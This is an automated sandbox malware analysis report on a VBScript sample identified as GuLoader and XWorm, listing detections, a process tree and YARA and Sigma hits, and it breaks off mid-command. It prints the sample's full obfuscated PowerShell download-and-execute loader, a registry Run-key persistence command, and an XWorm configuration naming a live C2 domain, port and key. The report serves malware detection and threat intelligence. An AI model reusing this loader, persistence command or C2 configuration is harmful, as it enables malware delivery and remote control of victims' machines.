Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
temp.vbs

Overview

General Information

Sample name:temp.vbs
Analysis ID:1445938
MD5:eb3f3f1471a124dbe6072f3ef42509d3
SHA1:2992f70f82729ec0e3f09165fa566544a80c9e12
SHA256:1272222474d0a004d1d74e17acd3c30105a92a13fe1e50168ea0c68f460f268e
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2620 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5948 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4040 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5948 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1912 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5096 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 4928 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["xw9402may.duckdns.org"], "Port": "9402", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1678157134.0000000008490000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000E.00000002.1669259847.00000000056D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000E.00000002.1678448244.000000000A310000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_4788.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_4040.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe0cc:$b2: ::FromBase64String(
              • 0xd1ad:$s1: -join
              • 0x6959:$s4: +=
              • 0x6a1b:$s4: +=
              • 0xac42:$s4: +=
              • 0xcd5f:$s4: +=
              • 0xd049:$s4: +=
              • 0xd18f:$s4: +=
              • 0x175cf:$s4: +=
              • 0x1764f:$s4: +=
              • 0x17715:$s4: +=
              • 0x17795:$s4: +=
              • 0x1796b:$s4: +=
              • 0x179ef:$s4: +=
              • 0xd976:$e4: Get-WmiObject
              • 0xdb65:$e4: Get-Process
              • 0xdbbd:$e4: Start-Process
              • 0x160f3:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs", ProcessId: 2620, ProcessName: wscript.exe
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1912, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", ProcessId: 5096, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4928, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5096, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", ProcessId: 4928, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1912, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD 